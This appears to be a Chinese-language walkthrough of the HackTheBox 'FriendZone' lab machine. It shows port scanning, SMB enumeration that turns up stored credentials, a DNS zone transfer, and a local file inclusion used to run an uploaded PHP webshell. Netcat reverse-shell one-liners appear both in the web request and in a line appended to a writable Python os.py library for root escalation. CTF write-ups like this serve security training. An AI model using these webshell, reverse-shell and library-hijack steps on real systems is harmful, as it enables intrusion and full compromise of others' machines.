端口扫描
nmap -sS -Pn -n --open -T4 -p 1-65535 10.10.10.123目录扫描
不清楚是什么,密码?cms?
smb漏洞扫描
enum4linux 10.10.10.123more creds.txt发现了登陆密码
admin:[email protected]#回头看,443端口是404,但是开了53端口,查看证书发现了一个域名
子域名目录扫描
dirsearch https://friendzone.red/base64解密也灭发现什么
又把目标转到dns上了
dig axfr friendzone.red @10.10.10.123这些域名写入hosts
文件包含
然后挨个尝试
密码就是smb里查到的admin
让访问dash文件
有点像文件包含漏洞,读passwd 没显示
当我读取login页面,发现成功了
说明存在文件包含,这时登陆smb,写一个webshell,然后监听
smb写文件
但是路径不清楚,不过在前面smb漏洞扫描中发现其中有一个路径是/etc/file
这里可使用nmap脚本进行探测
nmap --script smb-enum-shares.nse -p445 10.10.10.123cat cmd.php<?php systems($_REQUEST['cmd']);?>smbclient //10.10.10.123/Development -c 'put cmd.php 1.php'
文件包含,还是相对路径使用?传参数就不成功换成&就OK了
https://administrator1.friendzone.red/dashboard.php?image_id=&pagename=../../../etc/Development/1&cmd=id反弹shell
https://administrator1.friendzone.red/dashboard.php?image_id=&pagename=../../../etc/Development/1&cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>%261|nc 10.10.14.10 7777 >/tmp/froot提权
信息收集,使用pspy64 在opt下发现脚本文件
查询可写文件
cd /usr/lib/python2.7find -type f -writable -ls
发现os.py可写入,于是写入反弹shell命令,运行脚本,就会引用os库,就能产生反弹shell
echo "system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 9999 >/tmp/f')" >> /usr/lib/python2.7/os.py总结:像HTB这种,每一个端口细节都不能放过,能渗透就都渗透一遍,常规端口不行,就全端口,一般也都是端口扫描,目录扫描,漏洞扫描,至于啥地步就看信息收集的能力了。
文章来源: http://mp.weixin.qq.com/s?__biz=MzU3MDg2NDI4OA==&mid=2247487514&idx=1&sn=b93f6b2a5c4f7b147361e1b2a1abe9df&chksm=fce9b7d5cb9e3ec3e8e8fb9fd503dc71aaf412098f6a2c5540ff40c8a2310b6335dcfbf0da88#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh